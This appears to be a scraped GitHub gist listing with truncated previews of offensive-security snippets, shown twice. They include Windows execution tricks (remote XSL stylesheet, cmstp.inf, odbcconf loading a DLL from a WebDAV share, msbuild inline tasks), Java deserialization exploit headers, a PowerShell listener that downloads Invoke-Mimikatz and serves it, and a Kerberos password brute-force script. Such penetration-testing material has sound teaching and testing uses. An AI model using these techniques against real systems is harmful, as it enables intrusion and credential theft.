Chris Gates carnal0wnage

## xsl-notepad.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>

## cmstp.inf
;cmstp.exe /s cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]

## odbcconf.cs
/*
To use with odbcconf.exe:

odbcconf /S /A {REGSVR odbcconf.dll}

or, from a remote location (if WebDAV support enabled):
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
*/

using System;

## msbuild.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

## gcloud-cheat-sheet.md

      
              1 file
            
          
              559 forks
            
          
              22 comments
            
          
              1064 stars
            
          
                pydevops
                / gcloud-cheat-sheet.md
            
            
              Last active
              April 18, 2024 08:42
            
              
                gcp gcloud cheat sheet
              
          
0.1. References
0.2. Other cheatsheets
0.3. Manage multiple gcloud config configurations

0.3.1. Switch gcloud context with gcloud config


0.4. Credentials
0.5. info
0.6. projects
0.7. zones & regions
0.8. Organization
0.9. billing


## ManualPayloadGenerate.java
/*
    DiabloHorn - https://diablohorn.com
    For learning purposes we build the groovy payload ourselves instead of using
    ysoserial. This helps us better understand the chain and the mechanisms
    involved in exploiting this bug.

    compile with:
        javac -cp <path to groovy lib> ManualPayloadGenerate.java
    Example:
        javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java

## deserlab_exploit.py
#!/usr/bin/env python
"""
    DiabloHorn - https://diablohorn.com
    References
        https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
        https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
        https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
        http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
        https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
        https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

## server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

## blackhat_arsenal.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                godinezj
                / blackhat_arsenal.md
            
            
              Created
              July 27, 2017 18:34
            
          
    Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:

Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
xxe-example, see https://github.com/rgerganov/xxe-example


## kinit_brute.sh
#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
	<?xml version="1.0"?>
	<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?>
	<customers>
	<customer>
	<name>Microsoft</name>
	</customer>
	</customers>
	;cmstp.exe /s cmstp.inf

	[version]
	Signature=$chicago$
	AdvancedINF=2.5

	[DefaultInstall_SingleUser]
	UnRegisterOCXs=UnRegisterOCXSection

	[UnRegisterOCXSection]
	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"
	/*
	DiabloHorn - https://diablohorn.com
	For learning purposes we build the groovy payload ourselves instead of using
	ysoserial. This helps us better understand the chain and the mechanisms
	involved in exploiting this bug.

	compile with:
	javac -cp <path to groovy lib> ManualPayloadGenerate.java
	Example:
	javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
	#!/usr/bin/env python
	"""
	DiabloHorn - https://diablohorn.com
	References
	https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
	https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
	https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
	http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
	https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
	https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
	$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
	$Hso = New-Object Net.HttpListener
	$Hso.Prefixes.Add("http://+:8080/")
	$Hso.Start()
	While ($Hso.IsListening) {
	$HC = $Hso.GetContext()
	$HRes = $HC.Response
	$HRes.Headers.Add("Content-Type","text/plain")
	If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
	$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
	#!/bin/bash

	# Title: kinit_brute.sh
	# Author: @ropnop
	# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
	# The script configures the realm and KDC for you based on the domain provided and the domain controller
	# Since this configuration is only temporary though, if you want to actually use the TGT you should actually edit /etc/krb5.conf
	# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
	# Note: this will lock out accounts if a domain lockout policy is set. Be careful